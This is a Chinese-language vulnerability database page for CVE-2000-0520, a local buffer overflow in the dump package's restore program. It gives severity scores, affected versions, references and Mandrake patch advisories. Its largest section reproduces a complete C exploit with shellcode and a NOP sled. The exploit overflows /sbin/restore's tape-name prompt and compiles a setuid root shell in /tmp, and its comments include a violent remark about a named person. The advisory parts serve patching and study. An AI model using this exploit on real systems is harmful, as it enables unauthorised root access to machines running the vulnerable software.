CVE-2000-0520
CVSS7.2
发布时间 :2000-06-07 00:00:00
修订时间 :2016-10-17 22:07:15
NMCOES    

[原文]Buffer overflow in restore program 0.4b17 and earlier in dump package allows local users to execute arbitrary commands via a long tape name.


[CNNVD]多个Linux供应商restore缓冲区溢出漏洞(CNNVD-200006-031)

        dump包中restore程序0.4b17和更早的版本存在缓冲区溢出漏洞。本地用户借助超长磁带名称可以执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:stelian:pop_dump:0.4b15.30
cpe:/a:stelian:pop_dump:0.4b9.9
cpe:/a:stelian:pop_dump:0.4b15.1
cpe:/a:stelian:pop_dump:0.4b16.0
cpe:/a:stelian:pop_dump:0.4b17.0
cpe:/a:stelian:pop_dump:0.4b9.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0520
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0520
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-031
(官方数据源) CNNVD

- 其它链接及资源

http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=11880
(VENDOR_ADVISORY)  MISC  http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=11880
http://marc.info/?l=bugtraq&m=96240393814071&w=2
(UNKNOWN)  BUGTRAQ  20000630 CONECTIVA LINUX SECURITY ANNOUNCEMENT - dump
http://www.securityfocus.com/bid/1330
(VENDOR_ADVISORY)  BID  1330

- 漏洞信息

多个Linux供应商restore缓冲区溢出漏洞
高危 缓冲区溢出
2000-06-07 00:00:00 2005-10-20 00:00:00
本地  
        dump包中restore程序0.4b17和更早的版本存在缓冲区溢出漏洞。本地用户借助超长磁带名称可以执行任意命令。

- 公告与补丁

        The package has been patched by its maintainer, and a new version released.
        Linux-Mandrake 6.0:
        828d750c80c021c6253cac0191486fb1 6.0/RPMS/dump-0.4b18-1mdk.i586.rpm
        3e6355619c5ee93ac3505efdb35831fe 6.0/RPMS/rmt-0.4b18-1mdk.i586.rpm
        4ff0d0a768b603f22a40745da303e365 6.0/SRPMS/dump-0.4b18-1mdk.src.rpm
        Linux-Mandrake 6.1:
        5a6587e3320eefb639ff4dad95e291be 6.1/RPMS/dump-0.4b18-1mdk.i586.rpm
        582e35490586bcf04f1d35dcb04b6b23 6.1/RPMS/rmt-0.4b18-1mdk.i586.rpm
        4ff0d0a768b603f22a40745da303e365 6.1/SRPMS/dump-0.4b18-1mdk.src.rpm
        Linux-Mandrake 7.0:
        6f9918a61ced3dd8d20cf2b9b34508d8 7.0/RPMS/dump-0.4b18-1mdk.i586.rpm
        59c52401e9eb452fe9876d99cf2448bf 7.0/RPMS/rmt-0.4b18-1mdk.i586.rpm
        4ff0d0a768b603f22a40745da303e365 7.0/SRPMS/dump-0.4b18-1mdk.src.rpm
        Linux-Mandrake 7.1:
        1c14f72e09d69fcd4645ea2bd80c4ab3 7.1/RPMS/dump-0.4b18-1mdk.i586.rpm
        6d419e7e52dda174f7250b1b59c6b614 7.1/RPMS/rmt-0.4b18-1mdk.i586.rpm
        4ff0d0a768b603f22a40745da303e365 7.1/SRPMS/dump-0.4b18-1mdk.src.rpm
        To upgrade automatically, use < MandrakeUpdate >
        If you want to upgrade manually, download the updated package from one
        of our FTP server mirrors and uprade with "rpm -Uvh package_name".
        You can download the updates directly from:
         ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates
         ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates
        Stelian Pop dump 0.4 b15-30
        
        Stelian Pop dump 0.4 b16-0
        
        Stelian Pop dump 0.4 b9-9
        
        Stelian Pop dump 0.4 b17-0
        
        Stelian Pop dump 0.4 b9-0
        
        Stelian Pop dump 0.4 b15-1
        

- 漏洞信息 (20004)

Stelian Pop dump 0.4 restore Buffer Overflow Vulnerability (EDBID:20004)
linux local
2000-06-07 Verified
0 Stan Bubrouski
N/A [点击下载]
source: http://www.securityfocus.com/bid/1330/info


A buffer overflow exists in the 'restore' program, part of the dump 0.4b15-1 package, distributed with RedHat Linux 6.2. By supplying a long string containing machine executable code at the prompt for a tape name, it is possible for an attacker to execute arbitrary code with root privileges.

The buffer overflow lies in the tape.c source file:
/dump-0.4b15/compat/include/protocols/dumprestore.h: line 53: #define TP_BSIZE 1024
/dump-0.4b15/restore/tape.c: line 311: char buf[TP_BSIZE];
/dump-0.4b15/restore/tape.c: line 357: (void) fgets(buf, BUFSIZ, terminal)
/dump-0.4b15/restore/tape.c: line 382: (void) fgets(buf, BUFSIZ, terminal);

As BUFSIZ is defined to be 8192, the fgets() will attempt to copy up to 8192 bytes in to a 1024 byte buffer. 

/* 
   DO NOT DISTRIBUTE     -     DO NOT DISTRIBUTE     -     DO NOT DISTRIBUTE 

   Restore In Peace ?

   Guess not, silly mistakes keep being made in the dump package time
   and time again... Someone should give it an audit once

    For once, NOT a L4m3rz stylish shellscript, but a pure C program that
    does the same trick.
    It's so messy that I have changed my mind about not writing shellscript
    exploits and will go and write a L4m3rz stylish script next time :)

    Use as: rip <type> [offset]
    Where type is: 1) dump 0.3-14 on regular Linux boxes
                   2) dump 0.3-14 on Linux boxes with 2.2.X && X<16 kernel
                   3) dump-0.4b13 on regular Linux boxes
                   4) dump-0.4b13 on Linux boxes with the buggy kernel

    A Linux box with a buggy kernel will yield root. In other cases we get
    a setgid root.

    Type (1) might function a bit buggy with bash 2 since we cannot setgid
    to 0 when we're egid 0 - set SHAT to ash or zsh instead :(
    I realized that type 2 also doesn't work perfectly with bash2 - use a
    real shell for this exploit.

    Good Riddance!
       -- Scrippie
       -- ronald@grafix.nl - #phreak.nl - buffer0verfl0w security

    Love goes out to: Hester, Maja, Renata

    I hope the following person will ambushed by villains with chainsaws:
       Gerrie Mansur

    Shouts to: all my friends @ircnet and @IRL

   DO NOT DISTRIBUTE     -     DO NOT DISTRIBUTE     -     DO NOT DISTRIBUTE 

*/

#include <stdio.h>
#include <linux/capability.h>
#include <linux/unistd.h>
#include <sys/types.h>

#define NOP	0x90		/* Here I am again, I'm coming back for more */
#define RETA314	2052		/* Index number of the return address */
#define RETA4b13 2068
#define NUMNOPS	700		/* 700 usefull nops on the stack */
#define SHELLAT	"/tmp/loki"	/* Hail to thee, god of evil! */

#define SHAT	"/bin/ash"	/* And to thee, *nix utilities! */
#define CHOWNAT	"/bin/chown"
#define CHMODAT "/bin/chmod"

#define GCCAT	"/usr/bin/gcc"	/* And to thee, GNU utilities! */

#define RESTAT	"/sbin/restore"	/* And to thee, buggy file! */

char hellcode[] =
   "\x66\x31\xc0\x66\x31\xdb\xb0\x17\xcd\x80" /* Bash 2 evasion */
   "\x66\x31\xc0\x66\x31\xdb\xb0\x2e\xcd\x80" /* Idem for gid */
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/tmp/lk";

_syscall2(int, capset, cap_user_header_t, header, const cap_user_data_t, data)
extern int capset(cap_user_header_t header, cap_user_data_t data);
void banner(void);
void makeLKregular(void);
void makeLKbuggyKernel(void);
void makeCFILE(void);

unsigned long get_sp(void) {
   __asm__("movl %esp, %eax");
}

main(int argc, char **argv)
{
   FILE *evilRestore, lk;
   char *overflow;
   unsigned long addy;
   int offset=0;
   int retapos;
   pid_t child;
   int type;

   if(argc<2) {
      banner();
      exit(-1);
   }

   if(argc == 3) offset = atoi(argv[2]);

   switch(atoi(argv[1])) {
      case 1:
         printf("Assuming Dump package version: dump-0.3-14\n");
         printf("Trying to grab SGID root shell...\n");
         type = 1;
         offset = 2500;
         retapos = RETA314;
         break;
      case 2:
         printf("Assuming Dump package version: dump-0.3-14\n");
         printf("Trying to grab SUID root shell...\n");
         type = 2;
         offset = 2500;
         retapos = RETA314;
         break;
      case 3:
         printf("Assuming Dump package version: dump-0.4b13\n");
         printf("Trying to grab SGID root shell...\n");
         type = 1;
         offset = 6000;
         retapos = RETA4b13;
         break;
      case 4:
         printf("Assuming Dump package version: dump-0.4b13\n");
         printf("Trying to grab SUID root shell...\n");
         type = 2;
         offset = 6000;
         retapos = RETA4b13;
         break;
      default:
         printf("Unknown type - exiting\n");
         exit(-1);
   }

   if(type == 2) {
        struct __user_cap_header_struct caph={_LINUX_CAPABILITY_VERSION, 0};
        struct __user_cap_data_struct capd={0, 0, 0xfffffe7f};
        capset(&caph, &capd);
        printf("Dropped the SETUID_CAP...\n");
   }

   addy = get_sp() - offset;

   overflow = (char *) malloc(retapos+5);

   memset(overflow, 0x90, retapos);

   memcpy((overflow+NUMNOPS), hellcode, strlen(hellcode));

   overflow[retapos] = addy & 0xff;
   overflow[retapos+1] = (addy >> 8 & 0xff);
   overflow[retapos+2] = (addy >> 16 & 0xff);
   overflow[retapos+3] = (addy >> 24 & 0xff);
   overflow[retapos+4] = 0x00;

   evilRestore = fopen("/tmp/t", "w");

   printf("Building C program wrapper...\n");
   makeCFILE();
   printf("Building ShellScript that will be called...\n");

   if(type == 1) makeLKregular();
   if(type == 2) makeLKbuggyKernel();

   printf("Building overflow file...\n");
   printf("Using address: %x\n", addy);

   fprintf(evilRestore, "n\nn\nn\nn\n1\n");
   fprintf(evilRestore, overflow);
   fprintf(evilRestore, "\n1\nnone\n");

   fflush(evilRestore);
   fclose(evilRestore);

   printf("Executing: %s\n", RESTAT);
   sleep(3);

   if((child = fork()) == 0) {
      char blaat[200];
      snprintf(blaat, 200, "%s -R < /tmp/t\n", RESTAT);
      system(blaat);
      unlink("/tmp/t");
      unlink("/tmp/lk");
   }

   printf("\nIf everything worked out you can now run: %s\n", SHELLAT);

}

void makeLKregular(void)
{
   FILE *lk;
   char blaat[1000];	/* Phjear the allmighty mem-sucker! */

   lk = fopen("/tmp/lk", "w");

   snprintf(blaat, 1000, "#!%s\n%s .root %s\n%s 6755 %s\n",
            SHAT, CHOWNAT, SHELLAT, CHMODAT, SHELLAT);

   fprintf(lk, blaat);
   fflush(lk);
   fclose(lk);
   umask(0);
   chmod("/tmp/lk", 0755);
}

void makeLKbuggyKernel(void)
{
   FILE *lk;
   char blaat[1000];    /* Phjear the allmighty mem-sucker! */

   lk = fopen("/tmp/lk", "w");

   snprintf(blaat, 1000, "#!%s\n%s root.root %s\n%s 6755 %s\n",
            SHAT, CHOWNAT, SHELLAT, CHMODAT, SHELLAT);

   fprintf(lk, blaat);
   fflush(lk);
   fclose(lk);
   umask(0);
   chmod("/tmp/lk", 0755);
}


void makeCFILE(void)
{
   FILE *loki;
   pid_t child;

   loki = fopen("/tmp/loki.c", "w");
   fprintf(loki, "#include <stdio.h>\n\n");
   fprintf(loki, "main()\n");
   fprintf(loki, "{\n   setuid(0);\n");
   fprintf(loki, "   setgid(0);\n");
   fprintf(loki, "   execl(\"");
   fprintf(loki, SHAT);
   fprintf(loki, "\", \"sh\", NULL);\n");
   fprintf(loki, "}");

   fflush(loki);
   fclose(loki);

   if((child = fork()) == 0) {
      execl(GCCAT, "gcc", "/tmp/loki.c", "-o", SHELLAT, NULL);
   }
   wait();
   unlink("/tmp/loki.c");
}

void banner(void)
{
   printf("Restore In Peace ? - Scrippie/#phreak.nl/b0f\n");
   printf("--------------------------------------------\n");
   printf("Use as: rip <type> [offset]\n");
   printf("Types - 1) dump-0.3-14 - Regular Linux\n");
   printf("      - 2) dump-0.3-14 - Linux with buggy kernel :)\n");
   printf("      - 3) dump-0.4b13 - Regular Linux\n");
   printf("      - 4) dump-0.4b13 - Linux with buggy kernel :)\n");
}
		

- 漏洞信息

13686
Linux restore Tape Name Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-06-07 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Linux Vendor restore Buffer Overflow Vulnerability
Boundary Condition Error 1330
No Yes
2000-06-07 12:00:00 2009-07-11 02:56:00
This vulnerability was posted to the Bugzilla bug tracking database for dump by Stan Bubrouski <satan@fastdial.net> on June 2, 2000. This vulnerability was posted to the Bugtraq mailing list by Riley Hassell <comsec.admin@gte.net>

- 受影响的程序版本

Stelian Pop dump 0.4 b9-9
+ S.u.S.E. Linux 6.3 ppc
+ S.u.S.E. Linux 6.3 alpha
+ S.u.S.E. Linux 6.3
Stelian Pop dump 0.4 b9-0
+ Debian Linux 2.1
Stelian Pop dump 0.4 b17-0
- Linux kernel 2.3 .x
- Linux kernel 2.2 .x
- Linux kernel 2.1 .x
Stelian Pop dump 0.4 b16-0
+ Debian Linux 2.2 pre potato
+ Debian Linux 2.2
Stelian Pop dump 0.4 b15-30
+ S.u.S.E. Linux 6.4
Stelian Pop dump 0.4 b15-1
+ Mandriva Linux Mandrake 7.0
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Stelian Pop dump 0.4 b18-0
- Linux kernel 2.3 .x
- Linux kernel 2.2 .x
- Linux kernel 2.1 .x

- 不受影响的程序版本

Stelian Pop dump 0.4 b18-0
- Linux kernel 2.3 .x
- Linux kernel 2.2 .x
- Linux kernel 2.1 .x

- 漏洞讨论

A buffer overflow exists in the 'restore' program, part of the dump 0.4b15-1 package, distributed with RedHat Linux 6.2. By supplying a long string containing machine executable code at the prompt for a tape name, it is possible for an attacker to execute arbitrary code with root privileges.

The buffer overflow lies in the tape.c source file:
/dump-0.4b15/compat/include/protocols/dumprestore.h: line 53: #define TP_BSIZE 1024
/dump-0.4b15/restore/tape.c: line 311: char buf[TP_BSIZE];
/dump-0.4b15/restore/tape.c: line 357: (void) fgets(buf, BUFSIZ, terminal)
/dump-0.4b15/restore/tape.c: line 382: (void) fgets(buf, BUFSIZ, terminal);

As BUFSIZ is defined to be 8192, the fgets() will attempt to copy up to 8192 bytes in to a 1024 byte buffer.

- 漏洞利用

Exploit available:

- 解决方案

The package has been patched by its maintainer, and a new version released.

Linux-Mandrake 6.0:
828d750c80c021c6253cac0191486fb1 6.0/RPMS/dump-0.4b18-1mdk.i586.rpm
3e6355619c5ee93ac3505efdb35831fe 6.0/RPMS/rmt-0.4b18-1mdk.i586.rpm
4ff0d0a768b603f22a40745da303e365 6.0/SRPMS/dump-0.4b18-1mdk.src.rpm

Linux-Mandrake 6.1:
5a6587e3320eefb639ff4dad95e291be 6.1/RPMS/dump-0.4b18-1mdk.i586.rpm
582e35490586bcf04f1d35dcb04b6b23 6.1/RPMS/rmt-0.4b18-1mdk.i586.rpm
4ff0d0a768b603f22a40745da303e365 6.1/SRPMS/dump-0.4b18-1mdk.src.rpm

Linux-Mandrake 7.0:
6f9918a61ced3dd8d20cf2b9b34508d8 7.0/RPMS/dump-0.4b18-1mdk.i586.rpm
59c52401e9eb452fe9876d99cf2448bf 7.0/RPMS/rmt-0.4b18-1mdk.i586.rpm
4ff0d0a768b603f22a40745da303e365 7.0/SRPMS/dump-0.4b18-1mdk.src.rpm

Linux-Mandrake 7.1:
1c14f72e09d69fcd4645ea2bd80c4ab3 7.1/RPMS/dump-0.4b18-1mdk.i586.rpm
6d419e7e52dda174f7250b1b59c6b614 7.1/RPMS/rmt-0.4b18-1mdk.i586.rpm
4ff0d0a768b603f22a40745da303e365 7.1/SRPMS/dump-0.4b18-1mdk.src.rpm

To upgrade automatically, use < MandrakeUpdate >

If you want to upgrade manually, download the updated package from one
of our FTP server mirrors and uprade with "rpm -Uvh package_name".

You can download the updates directly from:
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates


Stelian Pop dump 0.4 b15-30

Stelian Pop dump 0.4 b16-0

Stelian Pop dump 0.4 b9-9

Stelian Pop dump 0.4 b17-0

Stelian Pop dump 0.4 b9-0

Stelian Pop dump 0.4 b15-1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站